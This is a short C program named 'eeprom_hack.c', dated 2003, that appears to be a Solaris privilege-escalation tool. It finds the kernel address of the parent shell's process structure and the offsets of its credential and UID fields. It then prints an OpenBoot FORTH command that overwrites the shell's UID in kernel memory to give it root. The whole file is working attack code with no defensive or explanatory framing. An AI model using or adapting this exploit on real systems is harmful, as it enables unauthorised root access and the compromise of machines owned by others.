/*
        eeprom_hack.c
        johnc@grok.org.uk 23rd July 2003

*/

#include <fcntl.h>
#include <procfs.h>
#include <stdio.h>
#include <sys/proc.h>
#include <sys/cred.h>
#include <unistd.h>
 
int main(int argc, char *argv[]) {
 
        struct proc proc_struct;
        struct cred cred_struct;
        long offset1, offset2;
        pid_t parent;
        struct psinfo psinfo_struct;
        char filename[30];
        int psfile;
        uintptr_t target;
 
        /* Find offset of credentials in process structure, and
        the offset of the UID in the actual credentials structure */
 
        offset1 = (long) &proc_struct.p_cred - (long) &proc_struct;
        offset2 = (long) &cred_struct.cr_uid - (long) &cred_struct;
 
        /* Get parent PID and then the base address */
 
        parent = getppid();
        snprintf(filename, 30, "/proc/%u/psinfo", parent);
	filename[sizeof(filename)-1] = 0;

        psfile = open(filename, O_RDONLY, 0);
        read(psfile, &psinfo_struct, sizeof(psinfo_struct));
        close (psfile);
 
        target = psinfo_struct.pr_addr;
 
        if (!target) {
                printf("ERROR: 32/64 bit mismatch\n");
                exit(1);
        }
 
        printf("Shell with PID %lu found at address 0x%lx\n", parent, target);
 
        /* Print the FORTH command for this architecture */
 
        printf("\nhex 0 %lx %lx + x@ %lx + l!\n\n", target, offset1, offset2);
}